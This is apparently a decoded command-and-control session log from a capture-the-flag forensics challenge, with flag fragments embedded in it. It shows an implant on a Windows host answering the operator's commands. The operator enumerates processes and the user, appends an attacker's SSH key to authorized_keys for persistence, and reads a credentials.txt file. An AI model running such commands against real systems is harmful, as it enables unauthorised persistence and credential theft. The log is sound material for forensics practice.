rq : 1BhuY4/niTopIBHAN6vvmQ==
infoback;0;10.10.10.22|SRV01|SRV01svc01|Windows 10 Enterprise Evaluation|0.1.6.1
rq : procview;
procview;svchost?2060;svchost?5316;ApplicationFrameHost?4920;csrss?388;svchost?1372;svchost?832;VBoxTray?2748;fontdrvhost?684;services?576;svchost?3528;lsass?584;svchost?6872;svchost?1552;spoolsv?1748;VBoxService?1156;svchost?760;conhost?4108;svchost?1152;dllhost?6864;svchost?2528;svchost?1936;Memory Compression?1428;RuntimeBroker?4692;svchost?4112;svchost?1932;svchost?748;smss?284;svchost?1140;svchost?6852;svchost?2320;MicrosoftEdge?5076;svchost?1332;svchost?740;svchost?3888;conhost?4896;dwm?340;java?6052;svchost?928;svchost?3488;YourPhone?1320;svchost?1516;dllhost?4204;SearchUI?4664;svchost?328;winlogon?524;SgrmBroker?6628;svchost?2096;svchost?1504;cmd?2488;svchost?1304;NisSrv?2336;MicrosoftEdgeSH?5636;svchost?1104;browser_broker?4592;svchost?1100;svchost?5284;explorer?4052;svchost?1164;svchost?2076;svchost?1680;aQ4caZ?7148;svchost?692;svchost?100;dumpcap?3516;MsMpEng?2260;RuntimeBroker?4820;svchost?1272;Microsoft.Photos?6392;svchost?3436;fontdrvhost?676;cmd?84;taskhostw?3628;RuntimeBroker?6188;RuntimeBroker?1384;java?7028;MicrosoftEdgeCP?5592;svchost?1256;svchost?3816;csrss?464;Registry?68;sihost?3416;SecurityHealthSystray?3156;svchost?6368;svchost?6564;wininit?456;ctfmon?3940;svchost?1636;SecurityHealthService?844;svchost?1040;svchost?2024;svchost?6980;svchost?1628;svchost?1824;svchost?1288;wlms?2216;RuntimeBroker?5564;svchost?5364;svchost?1620;svchost?2012;svchost?396;svchost?6540;RuntimeBroker?6780;WindowsInternal.ComposableShell.Experiences.TextInput.InputApp?2200;svchost?1604;svchost?788;svchost?1400;uhssvc?6824;SearchIndexer?5532;svchost?4940;svchost?3560;svchost?1392;svchost?1588;svchost?1784;wrapper?2176;svchost?2568;ShellExperienceHost?4536;System?4;conhost?2368;OneDrive?1184;svchost?1472;Idle?0;
rq : cmd;C:;hostname
cmd;C:;srv01
rq : cmd;C:;whoami
cmd;C:;srv01svc01
rq : cmd;C:;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:Userssvc01.sshauthorized_keys
cmd;C:;
rq : cmd;C:;dir C:Userssvc01Documents
cmd;C:; Volume in drive C is Windows 10
Volume Serial Number is B4A6-FEC6
Directory of C:Userssvc01Documents
02/28/2024 07:13 AM <DIR> .
02/28/2024 07:13 AM <DIR> ..
02/28/2024 05:14 AM 76 credentials.txt
1 File(s) 76 bytes
2 Dir(s) 24,147,230,720 bytes free
rq : cmd;C:;type C:Userssvc01Documentscredentials.txt
_h45_b33n_r357
rq : lsdrives
lsdrives;C:|
rq : lsfiles
rq : lsfiles-C:
rq : lsfiles-C:
lsfiles;C:temp;aQ4caZ.exe?1?29184|
{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}